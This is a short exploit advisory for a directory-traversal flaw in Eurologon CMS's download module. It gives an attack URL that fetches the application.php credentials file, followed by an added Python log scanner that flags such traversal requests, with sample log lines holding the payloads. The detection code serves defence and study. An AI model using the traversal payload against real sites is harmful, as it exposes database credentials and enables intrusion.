Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Eurologon CMS Db credentials disclosure / files download
#By KiNgOfThEwOrLd
PoC
The download module does not correctly check the file parameter, so using directory traversal we can get all the files hosted in the target's web space.
Get Database Credentials
http://[target]/users/files.php?mode=download&file=…/…/application.php
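
Added example (not part of the original advisory): a log check for requests to the download module whose file parameter tries to leave the download directory. The log format (Apache combined), the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request line in a log entry

def decode_fully(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded dots and slashes are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_reason(file_param):
    """Return why a `file` value is suspicious, or None if it looks benign."""
    path = decode_fully(file_param).replace("\\", "/")
    if "\x00" in path:
        return "null byte"
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return "absolute path"
    if ".." in path.split("/"):
        return "parent-directory segment"
    return None

def scan(lines):
    """Yield (line_number, file_value, reason) for suspicious download requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        query = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("/users/files.php") or query.get("mode") != ["download"]:
            continue
        for value in query.get("file", []):
            reason = traversal_reason(value)
            if reason:
                yield number, value, reason

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2008:10:00:00 +0000] "GET /users/files.php?mode=download&file=manual.pdf HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2008:10:00:07 +0000] "GET /users/files.php?mode=download&file=../application.php HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2008:10:00:09 +0000] "GET /users/files.php?mode=download&file=%252e%252e%252fapplication.php HTTP/1.1" 200 812',
    '198.51.100.2 - - [01/Jan/2008:10:01:00 +0000] "GET /users/files.php?mode=view&file=../x HTTP/1.1" 200 10',
]
```

parse_qs already decodes the query once, so the value reported for a double-encoded request is its once-decoded form; a 200 response on a flagged line is the case to investigate first.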